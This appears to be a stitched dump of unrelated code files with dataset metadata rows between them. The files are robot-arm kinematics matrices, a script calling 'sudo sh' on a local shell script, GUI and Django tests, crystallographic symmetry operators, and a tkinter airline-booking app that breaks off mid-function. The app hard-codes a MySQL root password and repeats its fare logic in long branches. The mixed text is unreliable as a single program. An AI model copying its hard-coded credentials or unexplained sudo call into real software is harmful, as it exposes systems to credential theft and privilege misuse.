Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.08518, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.18518, 0.0, 0.035],
[0.0, 1.0, 0.0, -0.18518, 0.0, 0.135]]).T
M = np.array([[1.0, 0.0, 0.0, 0.248575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.18518],
[0.0, 0.0, 0.0, 1.0]])
class mobile_wx200:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.104825, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.304825, 0.0, 0.05],
[0.0, 1.0, 0.0, -0.304825, 0.0, 0.25],
[1.0, 0.0, 0.0, 0.0, 0.304825, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.408575],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.304825],
[0.0, 0.0, 0.0, 1.0]])
class mobile_wx250s:
Slist = np.array([[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.104825, 0.0, 0.0],
[0.0, 1.0, 0.0, -0.354825, 0.0, 0.04975],
[1.0, 0.0, 0.0, 0.0, 0.354825, 0.0],
[0.0, 1.0, 0.0, -0.354825, 0.0, 0.29975],
[1.0, 0.0, 0.0, 0.0, 0.354825, 0.0]]).T
M = np.array([[1.0, 0.0, 0.0, 0.458325],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.354825],
[0.0, 0.0, 0.0, 1.0]])
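# Editor's sketch (assumes the `modern_robotics` package that accompanies the
# Modern Robotics textbook is installed; mr.FKinSpace(M, Slist, thetalist)
# returns the end-effector pose for a list of joint angles):
#
#   import numpy as np
#   import modern_robotics as mr
#
#   thetalist = np.zeros(4)                    # px100 has 4 arm joints
#   T = mr.FKinSpace(px100.M, px100.Slist, thetalist)
#   print(T)                                   # equals px100.M at the zero pose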
| 40.121951 | 76 | 0.336018 | 1,365 | 6,580 | 1.613919 | 0.058608 | 0.694507 | 0.759873 | 0.722651 | 0.9133 | 0.892419 | 0.878802 | 0.866546 | 0.862914 | 0.835225 | 0 | 0.42447 | 0.412462 | 6,580 | 163 | 77 | 40.368098 | 0.14537 | 0.031003 | 0 | 0.651515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007576 | 0 | 0.30303 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
323cd251474d65c7ad976d5f1585964cddc46a00 | 68 | py | Python | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | 1 | 2015-01-26T16:39:43.000Z | 2015-01-26T16:39:43.000Z | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | null | null | null | add_ip.py | GingerNinja23/CyberBoost | 2c0d7be801d4bc2a5a3a215b7224cd634a0474fb | [
"MIT"
] | null | null | null | import os
os.system('sudo sh /home/sivsushruth/Cyberpass/add_ip.sh') | 34 | 58 | 0.794118 | 12 | 68 | 4.416667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 68 | 2 | 58 | 34 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0.652174 | 0.536232 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
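# Editor's sketch (a safer equivalent using subprocess; the script path and
# sudo requirement are taken from the line above and may need adjusting):
#
#   import subprocess
#   subprocess.run(['sudo', 'sh', '/home/sivsushruth/Cyberpass/add_ip.sh'], check=True)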
329b0a81295d1ebbdac964b1ae5638802e90b536 | 2,603 | py | Python | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | null | null | null | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | 7 | 2019-03-02T08:23:11.000Z | 2019-07-06T14:18:23.000Z | tests/gui/permen_isolated_test_e2e.py | demid5111/approximate-enthropy | 2ec331087a1af0279a429656890d44a04c734903 | [
"MIT"
] | null | null | null | from gui_version import App
from tests.gui.app_testing_bed import PermEnTestingBed
from tests.gui.common import check_report
def test_permen_wo_windows(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_wo_windows_wo_norm(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_norm_permen_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_wo_windows_wo_norm_w_strides(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_windows_cb()
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_norm_permen_cb()
test_app.press_strides_permen_cb()
test_app.set_strides_permen('2')
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
def test_permen_w_windows(qtbot):
window = App()
qtbot.addWidget(window)
test_app = PermEnTestingBed(qtbot=qtbot, window=window)
qtbot.waitForWindowShown(window)
test_app.press_samen_apen_cb()
test_app.press_cordim_cb()
test_app.press_fracdim_cb()
assert not test_app.calculate_btn_state()
test_app.choose_any_file()
assert test_app.calculate_btn_state()
test_app.press_calculate_btn()
test_app.wait_until_calculation_is_done()
path = test_app.check_modal_not_error()
check_report(path)
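# Editor's sketch (a possible pytest.mark.parametrize refactor of the four
# near-identical tests above; the step names are the testing-bed methods each
# scenario toggles, with the shared setup and assertions factored out):
#
#   import pytest
#
#   SCENARIOS = {
#       'wo_windows': ('press_windows_cb',),
#       'wo_windows_wo_norm': ('press_windows_cb', 'press_norm_permen_cb'),
#       'w_windows': (),
#   }
#
#   @pytest.mark.parametrize('steps', SCENARIOS.values(), ids=SCENARIOS.keys())
#   def test_permen(qtbot, steps):
#       window = App()
#       qtbot.addWidget(window)
#       test_app = PermEnTestingBed(qtbot=qtbot, window=window)
#       qtbot.waitForWindowShown(window)
#       for step in steps:
#           getattr(test_app, step)()
#       # ... remaining shared press/assert/calculate sequence as above ...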
| 25.028846 | 59 | 0.759124 | 373 | 2,603 | 4.820375 | 0.128686 | 0.182981 | 0.14683 | 0.101224 | 0.914905 | 0.906563 | 0.906563 | 0.906563 | 0.906563 | 0.906563 | 0 | 0.000456 | 0.156742 | 2,603 | 103 | 60 | 25.271845 | 0.818679 | 0 | 0 | 0.871429 | 0 | 0 | 0.000384 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 1 | 0.057143 | false | 0 | 0.042857 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32c22c817619b077218b1ebb6e6f3bc4d35fb344 | 4,481 | py | Python | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 9 | 2018-09-10T04:29:50.000Z | 2020-08-08T17:38:40.000Z | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 5 | 2018-06-08T08:46:24.000Z | 2022-02-15T08:15:47.000Z | problematic/laue_symops.py | stefsmeets/problematic | b9b5294d93f70b7c6fa755594ab1f6111e4bc383 | [
"MIT"
] | 7 | 2019-07-16T16:18:05.000Z | 2021-11-04T14:27:00.000Z | symops = {
'1': [
'x, y, z'
],
'-1': [
'x, y, z',
'-x, -y, -z'
],
'2/m:a': [
'x, y, z',
'-x, y, -z',
'-x, -y, -z',
'x, -y, z'
],
'2/m:b': [
'x, y, z',
'-x, y, -z',
'-x, -y, -z',
'x, -y, z'
],
'2/m:c': [
'x, y, z',
'-x, -y, z',
'-x, -y, -z',
'x, y, -z'
],
'mmm': [
'x, y, z',
'-x, -y, z',
'x, -y, -z',
'-x, y, -z',
'-x, -y, -z',
'x, y, -z',
'-x, y, z',
'x, -y, z'
],
'4/m': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z'
],
'4/mmm': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'x, -y, -z',
'-x, y, -z',
'y, x, -z',
'-y, -x, -z',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z',
'-x, y, z',
'x, -y, z',
'-y, -x, z',
'y, x, z'
],
'-3': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z'
],
'-3m': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z'
],
'-3m1': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z'
],
'-31m': [
'x, y, z',
'-y, x-y, z',
'-x+y, -x, z',
'-y, -x, -z',
'-x+y, y, -z',
'x, x-y, -z',
'-x, -y, -z',
'y, -x+y, -z',
'x-y, x, -z',
'y, x, z',
'x-y, -y, z',
'-x, -x+y, z'
],
'6/m': [
'x, y, z',
'x-y, x, z',
'-y, x-y, z',
'-x, -y, z',
'-x+y, -x, z',
'y, -x+y, z',
'-x, -y, -z',
'-x+y, -x, -z',
'y, -x+y, -z',
'x, y, -z',
'x-y, x, -z',
'-y, x-y, -z'
],
'6/mmm': [
'x, y, z',
'x-y, x, z',
'-y, x-y, z',
'-x, -y, z',
'-x+y, -x, z',
'y, -x+y, z',
'x-y, -y, -z',
'-x, -x+y, -z',
'y, x, -z',
'-y, -x, -z',
'-x+y, y, -z',
'x, x-y, -z',
'-x, -y, -z',
'-x+y, -x, -z',
'y, -x+y, -z',
'x, y, -z',
'x-y, x, -z',
'-y, x-y, -z',
'-x+y, y, z',
'x, x-y, z',
'-y, -x, z',
'y, x, z',
'x-y, -y, z',
'-x, -x+y, z'
],
'm-3': [
'x, y, z',
'z, x, y',
'y, z, x',
'-y, -z, x',
'z, -x, -y',
'-y, z, -x',
'-z, -x, y',
'-z, x, -y',
'y, -z, -x',
'-x, -y, z',
'x, -y, -z',
'-x, y, -z',
'-x, -y, -z',
'-z, -x, -y',
'-y, -z, -x',
'y, z, -x',
'-z, x, y',
'y, -z, x',
'z, x, -y',
'z, -x, y',
'-y, z, x',
'x, y, -z',
'-x, y, z',
'x, -y, z'
],
'm-3m': [
'x, y, z',
'-y, x, z',
'-x, -y, z',
'y, -x, z',
'x, -z, y',
'x, -y, -z',
'x, z, -y',
'z, y, -x',
'-x, y, -z',
'-z, y, x',
'z, x, y',
'y, z, x',
'-y, -z, x',
'z, -x, -y',
'-y, z, -x',
'-z, -x, y',
'-z, x, -y',
'y, -z, -x',
'y, x, -z',
'-y, -x, -z',
'-x, z, y',
'-x, -z, -y',
'z, -y, x',
'-z, -y, -x',
'-x, -y, -z',
'y, -x, -z',
'x, y, -z',
'-y, x, -z',
'-x, z, -y',
'-x, y, z',
'-x, -z, y',
'-z, -y, x',
'x, -y, z',
'z, -y, -x',
'-z, -x, -y',
'-y, -z, -x',
'y, z, -x',
'-z, x, y',
'y, -z, x',
'z, x, -y',
'z, -x, y',
'-y, z, x',
'-y, -x, z',
'y, x, z',
'x, -z, -y',
'x, z, y',
'-z, y, -x',
'z, y, x'
]
}
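# A minimal usage sketch (an assumption, not part of the original module):
# each operator string above maps a fractional coordinate (x, y, z) to a
# symmetry-equivalent position, so it can be applied by evaluating the string
# with x, y and z bound.
def apply_symop(op, coord):
"""Apply one symmetry operator string to an (x, y, z) triple."""
x, y, z = coord
return eval(op, {"__builtins__": {}}, {"x": x, "y": y, "z": z})
# e.g. apply_symop('-y, x-y, z', (0.1, 0.2, 0.3)) == (-0.2, -0.1, 0.3)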
| 18.1417 | 23 | 0.15376 | 672 | 4,481 | 1.025298 | 0.025298 | 0.409289 | 0.439768 | 0.342525 | 0.952105 | 0.952105 | 0.937591 | 0.937591 | 0.92598 | 0.92598 | 0 | 0.008023 | 0.527114 | 4,481 | 246 | 24 | 18.215447 | 0.317131 | 0 | 0 | 0.813853 | 0 | 0 | 0.409284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
08e693f0e62ee0cef76fbcea9e4a8c63c58c0b6f | 125 | py | Python | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | setup_data.py | GulaAren/sharelinks | 6743539aeb43625635adc5cde4f0931bfc8b0e4d | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from account import models as account_models
from posts import models as posts_models
def make_user():
pass  # placeholder: seed users for the account app
def make_link_posts():
pass | 12.5 | 26 | 0.76 | 20 | 125 | 4.6 | 0.65 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009434 | 0.152 | 125 | 10 | 27 | 12.5 | 0.858491 | 0.136 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
3edf20dd4ae6f1ae6c52f17084a0393d3e8e4d51 | 4,079 | py | Python | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | 3 | 2019-05-04T08:22:38.000Z | 2019-12-14T13:07:49.000Z | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | 49 | 2019-07-02T15:17:09.000Z | 2022-03-21T20:11:59.000Z | users/tests/test_views.py | sapuri/srandom.com | e0a7843886a97329f9022d4889ffafa3de708448 | [
"MIT"
] | null | null | null | from django.shortcuts import resolve_url
from django.test import TestCase
from users import APP_NAME
from users.models import CustomUser, Location, Theme
class ListTests(TestCase):
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:list'))
self.assertEqual(200, resp.status_code)
class MypageTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:mypage', username=self.user.username))
self.assertEqual(200, resp.status_code)
class StatisticsTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:statistics', username=self.user.username))
self.assertEqual(200, resp.status_code)
class SettingsTests(TestCase):
def setUp(self):
self.client.force_login(self.create_user())
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:settings'))
self.assertEqual(200, resp.status_code)
class CleardataTests(TestCase):
def setUp(self):
self.user = self.create_user()
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:cleardata', username=self.user.username, sran_level=19))
self.assertEqual(200, resp.status_code)
class DeactivateTests(TestCase):
def setUp(self):
self.client.force_login(self.create_user())
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test') -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme)
def test_get(self):
resp = self.client.get(resolve_url(f'{APP_NAME}:deactivate'))
self.assertEqual(200, resp.status_code)
class DownloadTests(TestCase):
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test',
premium: bool = False) -> object:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme, premium=premium)
def test_get(self):
user = self.create_user(premium=True)
self.client.force_login(user)
resp = self.client.get(resolve_url(f'{APP_NAME}:download', file_type='csv'))
self.assertEqual(404, resp.status_code)
def test_get_ng(self):
user = self.create_user()
self.client.force_login(user)
resp = self.client.get(resolve_url(f'{APP_NAME}:download', file_type='csv'))
self.assertEqual(403, resp.status_code)
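# Each TestCase above carries an identical create_user staticmethod. A minimal
# sketch (an assumption, not part of the original file) of a mixin the test
# classes could inherit instead:
class UserFactoryMixin:
@staticmethod
def create_user(username: str = 'test', location: str = 'test', theme: str = 'test',
premium: bool = False) -> CustomUser:
location = Location.objects.create(location=location)
theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme, premium=premium)
# e.g. class MypageTests(UserFactoryMixin, TestCase): ...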
| 37.768519 | 112 | 0.684727 | 508 | 4,079 | 5.377953 | 0.125984 | 0.069546 | 0.079063 | 0.114202 | 0.855051 | 0.838946 | 0.838946 | 0.784773 | 0.784773 | 0.784773 | 0 | 0.007864 | 0.189507 | 4,079 | 107 | 113 | 38.121495 | 0.818512 | 0 | 0 | 0.6875 | 0 | 0 | 0.056141 | 0.010297 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.2375 | false | 0 | 0.05 | 0 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3efc905b61a2d18211e8ce774e3e076640d57e8c | 175,404 | py | Python | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
import time
import random
import sqlite3
import tkinter.ttk as ttk
import datetime
import mysql.connector as sqlcon
import pymysql
#=========================================================================================================================================
con = sqlcon.connect(host="localhost", user="root", password="Aman1234")  # connection to MySQL
cur = con.cursor(buffered=True)
cur.execute("create database if not exists travell")
cur.execute("use travell")
cur.execute("create table if not exists new"
"("
"Receipt_Ref varchar(50),"
"DateofOrder char(50),"
"Firstname char(50),"
"Surname char(50),"
"Address char(50),"
"PostCode varchar(50),"
"Telephone varchar(50),"
"Mobile varchar(50),"
"Email varchar(50),"
"var11 varchar(50),"
"var12 varchar(50),"
"var13 varchar(50),"
"Standard varchar(50),"
"Economy varchar(50),"
"FirstClass varchar(50),"
"PaidTax varchar(50),"
"SubTotal varchar(50),"
"TotalCosx varchar(50))")
class Travel:
def __init__(self,root):
self.root = root
self.root.title("ASRD Airways")
self.root.geometry("1350x750+0+0")
self.root.configure(background='black')
DateofOrder=StringVar()
DateofOrder.set(time.strftime("%d/%m/%Y"))
Receipt_Ref=StringVar()
PaidTax=StringVar()
SubTotal=StringVar()
TotalCost=StringVar()
var1=IntVar()
var2=IntVar()
var3=IntVar()
var4=IntVar()
var5=IntVar()
var6=IntVar()
var7=IntVar()
var8=IntVar()
var9=IntVar()
var10=IntVar()
var11=StringVar()
var12=StringVar()
var13=StringVar()
Firstname=StringVar()
Surname=StringVar()
Address=StringVar()
PostCode=StringVar()
Telephone=StringVar()
Mobile=StringVar()
Email=StringVar()
AirportTax =StringVar()
Mile =StringVar()
Travel_Ins =StringVar()
Luggage =StringVar()
Standard=StringVar()
Economy=StringVar()
FirstClass=StringVar()
AirportTax.set("0")
Mile.set("0")
Travel_Ins.set("0")
Luggage.set("0")
Standard.set("0")
Economy.set("0")
FirstClass.set("0")
#========================================Defined Function======================================
def iExit():
iExit=tkinter.messagebox.askyesno("ASRD Airways","Are you sure want to exit")
if iExit > 0:
root.destroy()
return
def Reset():
AirportTax.set("0")
Mile.set("0")
Travel_Ins.set("0")
Luggage.set("0")
Standard.set("0")
Economy.set("0")
FirstClass.set("0")
Firstname.set("")
Surname.set("")
Address.set("")
PostCode.set("")
Telephone.set("")
Mobile.set("")
Email.set("")
PaidTax.set("")
SubTotal.set("")
TotalCost.set("")
self.txtReceipt.delete("1.0",END)
var1.set(0)
var2.set(0)
var3.set(0)
var4.set(0)
var5.set(0)
var6.set(0)
var7.set(0)
var8.set(0)
var9.set(0)
var10.set(0)
var11.set("0")
var12.set("0")
var13.set("0")
self.cboDeparture.current(0)
self.cboDestination.current(0)
self.cboAccommodation.current(0)
self.txtAirportTax.configure(state =DISABLED)
self.txtMile.configure(state =DISABLED)
self.txtTravelling_Insurance.configure(state =DISABLED)
self.txtExt_Luggage.configure(state =DISABLED)
self.txtStandard.configure(state =DISABLED)
self.txtEconomy.configure(state =DISABLED)
self.txtFirstClass.configure(state =DISABLED)
def Receipt():
self.txtReceipt.delete("1.0",END)
x=random.randint(10853, 500831)
randomRef = str(x)
Receipt_Ref.set("Travel Bill: " + randomRef)
self.txtReceipt.insert(END,'Receipt Ref:\t\t\t\t\t' + Receipt_Ref.get() + "\n")
self.txtReceipt.insert(END,'Date:\t\t\t\t\t' + DateofOrder.get() + "\n")
self.txtReceipt.insert(END,'Flight:\t\t\t\t\t' + "Travelling Details \n")
self.txtReceipt.insert(END,'Firstname:\t\t\t\t\t' + Firstname.get() + "\n")
self.txtReceipt.insert(END,'Surname:\t\t\t\t\t' + Surname.get() + "\n")
self.txtReceipt.insert(END,'Address:\t\t\t\t\t' + Address.get() + "\n")
self.txtReceipt.insert(END,'PostCode: \t\t\t\t\t' + PostCode.get()+ "\n")
self.txtReceipt.insert(END,'Telephone: \t\t\t\t\t' + Telephone.get()+ "\n")
self.txtReceipt.insert(END,'Mobile: \t\t\t\t\t' + Mobile.get() + "\n")
self.txtReceipt.insert(END,'Email: \t\t\t\t\t'+ Email.get()+ "\n")
self.txtReceipt.insert(END,'Departure: \t\t\t\t\t'+ var11.get()+ "\n")
self.txtReceipt.insert(END,'Destination: \t\t\t\t\t'+ var12.get()+ "\n")
self.txtReceipt.insert(END,'Accommodation: \t\t\t\t\t'+ var13.get()+ "\n")
self.txtReceipt.insert(END,'Standard: \t\t\t\t\t'+ Standard.get()+ "\n")
self.txtReceipt.insert(END,'Economy: \t\t\t\t\t'+ Economy.get()+ "\n")
self.txtReceipt.insert(END,'FirstClass: \t\t\t\t\t'+ FirstClass.get()+ "\n")
self.txtReceipt.insert(END,'Paid:\t\t\t\t\t' + PaidTax.get()+"\n")
self.txtReceipt.insert(END,'SubTotal:\t\t\t\t\t' + str(SubTotal.get()) +"\n")
self.txtReceipt.insert(END,'Total Cost:\t\t\t\t\t' + str(TotalCost.get()))
#===========================================================SQL ADDITION =======================================================================
sqlCon = pymysql.connect(host="localhost", user="root", password="Aman1234", database="travell")
cur=sqlCon.cursor()
cur.execute("insert into new values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)",(
Receipt_Ref.get(),
DateofOrder.get(),
Firstname.get(),
Surname.get(),
Address.get(),
PostCode.get(),
Telephone.get(),
Mobile.get(),
Email.get(),
var11.get(),
var12.get(),
var13.get(),
Standard.get(),
Economy.get(),
FirstClass.get(),
PaidTax.get(),
SubTotal.get(),
TotalCost.get()
))
sqlCon.commit()
sqlCon.close()
tkinter.messagebox.showinfo("success","record entered succefully")
def Airport_Tax():
global paid1
if (var1.get() == 1):
self.txtAirportTax.configure(state= NORMAL)
Item1=float(45)
AirportTax.set("INR" + str(Item1))
paid1 = AirportTax.get()
elif var1.get()== 0:
self.txtAirportTax.configure(state= DISABLED)
AirportTax.set("0")
def Mileage():
global Item2
if (var2.get() == 1):
self.txtMile.configure(state= NORMAL)
Item2=(23345)
Mile.set((Item2))
elif var2.get()== 0:
self.txtMile.configure(state= DISABLED)
Mile.set("0")
def Travelling():
global Item3
if (var3.get() == 1):
self.txtTravelling_Insurance.configure(state= NORMAL)
Item3=float(63)
Travel_Ins.set("INR" + str(Item3))
elif var3.get()== 0:
self.txtTravelling_Insurance.configure(state= DISABLED)
Travel_Ins.set("0")
def Lug():
global Item4
if (var4.get() == 1):
self.txtExt_Luggage.configure(state= NORMAL)
Item4=float(334.59)
Luggage.set("INR" + str(Item4))
elif var4.get()== 0:
self.txtExt_Luggage.configure(state= DISABLED)
Luggage.set("0")
def Standard_Fees():
global Item5
if (var5.get() == 1):
self.txtStandard.configure(state= NORMAL)
Item5=float(274.9)
Standard.set("INR" + str(Item5))
elif var5.get()== 0:
self.txtStandard.configure(state= DISABLED)
Standard.set("0")
def Economy_Fees():
global Item6
if (var7.get() == 1):
self.txtEconomy.configure(state= NORMAL)
Item6=float(365.5)
Economy.set("INR" + str(Item6))
elif var7.get()== 0:
self.txtEconomy.configure(state= DISABLED)
Economy.set("0")
def FirstClass_Fees():
global Item7
if (var9.get() == 1 ):
self.txtFirstClass.configure(state= NORMAL)
Item7=float(564.3)
FirstClass.set("INR" + str(Item7))
elif (var9.get() == 0):
self.txtFirstClass.configure(state= DISABLED)
FirstClass.set("0")
def Total_Paid():
if ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var5.get() == 1 and var11.get() =="Delhi"
and var12.get()=="Kolkata" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(274.9)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR"+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR"+ str('%.2f'%((Cost_of_Fare)))
TT = "INR"+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var7.get() == 1 and var11.get() =="Kolkata"
and var12.get()=="Delhi" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(365.5)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR"+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR"+ str('%.2f'%((Cost_of_Fare)))
